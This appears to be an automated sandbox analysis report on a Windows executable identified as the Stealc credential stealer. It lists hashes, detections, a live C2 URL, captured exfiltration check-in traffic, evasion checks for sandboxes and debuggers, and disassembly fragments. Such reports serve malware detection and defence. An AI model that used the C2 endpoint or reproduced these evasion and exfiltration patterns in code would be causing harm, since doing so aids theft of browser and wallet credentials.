Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1522357
MD5:	0079fd2131677b1d9eab7228129b05c6
SHA1:	b990a78e97be25d3296df08c7fd3c2c2491804cb
SHA256:	e5d54dbfb6aa3a373538a399c8727551d092d8980fe263cccda5b4b910154a04
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 1.2.file.exe.a50000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	1_2_00A5C820
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A59AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00A59AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A57240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00A57240
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A59B60 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00A59B60
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A68EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_00A68EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00A638B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A64910
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_00A5DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_00A5E430
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_00A5ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_00A64570
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00A63EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A5F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A516D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A5DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_00A5BE70

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 37 35 35 39 37 32 46 38 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="hwid"B0755972F8951117388365------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="build"doma------BAFCGIJDAFBKFIECBGCA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A54880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_00A54880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 37 35 35 39 37 32 46 38 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="hwid"B0755972F8951117388365------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="build"doma------BAFCGIJDAFBKFIECBGCA--

Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/u8
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37s

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB	1_2_00DB88AB
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00D7819F	1_2_00D7819F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E04941	1_2_00E04941
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00CF1960	1_2_00CF1960
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00D92176	1_2_00D92176
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E16B3E	1_2_00E16B3E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E1DB09	1_2_00E1DB09
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E20C63	1_2_00E20C63
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DC3558	1_2_00DC3558
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E18575	1_2_00E18575
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E0ED2D	1_2_00E0ED2D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E22699	1_2_00E22699
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E11FBE	1_2_00E11FBE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DBBF4D	1_2_00DBBF4D

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00A545C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: aabwzlbm ZLIB complexity 0.9949325273449205

Source: file.exe, 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A68680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00A68680

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A63720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

1_2_00A63720

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 39%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1864704 > 1048576

Source: file.exe

Static PE information: Raw size of aabwzlbm is bigger than: 0x100000 < 0x1a1200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 1.2.file.exe.a50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aabwzlbm:EW;cxkmbtsd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aabwzlbm:EW;cxkmbtsd:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00A69860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1cf11f should be: 0x1d06b3

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: aabwzlbm
Source: file.exe	Static PE information: section name: cxkmbtsd
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EE50CA push 62950C49h; mov dword ptr [esp], edi	1_2_00EE50F2
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00F090C0 push ebx; mov dword ptr [esp], 2CFC6694h	1_2_00F09067
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E288D3 push 1D64D53Ah; mov dword ptr [esp], esi	1_2_00E28932
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E288D3 push 06744E82h; mov dword ptr [esp], ecx	1_2_00E2897B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E288D3 push ecx; mov dword ptr [esp], eax	1_2_00E289EC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EE90A6 push 1EA32B71h; mov dword ptr [esp], eax	1_2_00EE90C7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EE90A6 push ecx; mov dword ptr [esp], 255517EBh	1_2_00EE90DE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EAC0B9 push esi; mov dword ptr [esp], eax	1_2_00EAC0CA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EAC0B9 push edx; mov dword ptr [esp], 4382B9D1h	1_2_00EAC0FF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EAC0B9 push 398F2B31h; mov dword ptr [esp], ecx	1_2_00EAC175
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB08BC push 0D820FB2h; mov dword ptr [esp], ecx	1_2_00EB08F7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB08BC push 7AA7114Eh; mov dword ptr [esp], ebx	1_2_00EB096A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E9588B push eax; mov dword ptr [esp], ecx	1_2_00E958FE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EE5889 push ebx; mov dword ptr [esp], edi	1_2_00EE58AC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push eax; mov dword ptr [esp], 18C56015h	1_2_00DB897E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push esi; mov dword ptr [esp], eax	1_2_00DB89E3
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push edi; mov dword ptr [esp], 9521C58Bh	1_2_00DB8A36
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push 4B3D91B8h; mov dword ptr [esp], ecx	1_2_00DB8A6E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push 7A122765h; mov dword ptr [esp], ebx	1_2_00DB8A98
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E2F892 push edi; mov dword ptr [esp], 57075211h	1_2_00E300C0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EC6898 push 7AE67896h; mov dword ptr [esp], edi	1_2_00EC68D2
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A6B035 push ecx; ret	1_2_00A6B048
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_010F01AE push edx; mov dword ptr [esp], 7565A34Bh	1_2_010F01F1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_010F01AE push 5D8E4FC7h; mov dword ptr [esp], edx	1_2_010F02C5
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00F1405B push 6ED1F919h; mov dword ptr [esp], ebp	1_2_00F1406A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EFF05D push edx; mov dword ptr [esp], edi	1_2_00EFFC1F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00ECB833 push ebp; mov dword ptr [esp], 72633DF6h	1_2_00ECB863
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00F3D81A push ebx; mov dword ptr [esp], edx	1_2_00F3D831
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5D9FC push ecx; mov dword ptr [esp], 2FFF5BD7h	1_2_00E5DA28
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E881C9 push 6F824FABh; mov dword ptr [esp], ebp	1_2_00E88208
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E881C9 push 35C83454h; mov dword ptr [esp], ebp	1_2_00E8821E

Source: file.exe

Static PE information: section name: aabwzlbm entropy: 7.952978260214906

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

1_2_00A69860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E385 second address: E2E399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F60F0BA102Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E221C8 second address: E221D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2DC5E second address: E2DC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA1034h 0x00000009 popad 0x0000000a jc 00007F60F0BA1028h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E309BC second address: E30A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F60F0C8AB58h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007F60F0C8AB5Eh 0x0000002d or ecx, dword ptr [ebp+122D2890h] 0x00000033 push 77BECC32h 0x00000038 push ebx 0x00000039 jmp 00007F60F0C8AB61h 0x0000003e pop ebx 0x0000003f xor dword ptr [esp], 77BECCB2h 0x00000046 mov dl, 7Bh 0x00000048 push 00000003h 0x0000004a jmp 00007F60F0C8AB63h 0x0000004f push 00000000h 0x00000051 and di, 6FB6h 0x00000056 jnl 00007F60F0C8AB59h 0x0000005c push 00000003h 0x0000005e mov edi, dword ptr [ebp+122D29C8h] 0x00000064 call 00007F60F0C8AB59h 0x00000069 push ecx 0x0000006a push edi 0x0000006b push eax 0x0000006c pop eax 0x0000006d pop edi 0x0000006e pop ecx 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jp 00007F60F0C8AB56h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30A70 second address: E30A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30A76 second address: E30ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jnc 00007F60F0C8AB69h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F60F0C8AB5Eh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30ABE second address: E30AEE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F60F0BA102Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f jmp 00007F60F0BA1037h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
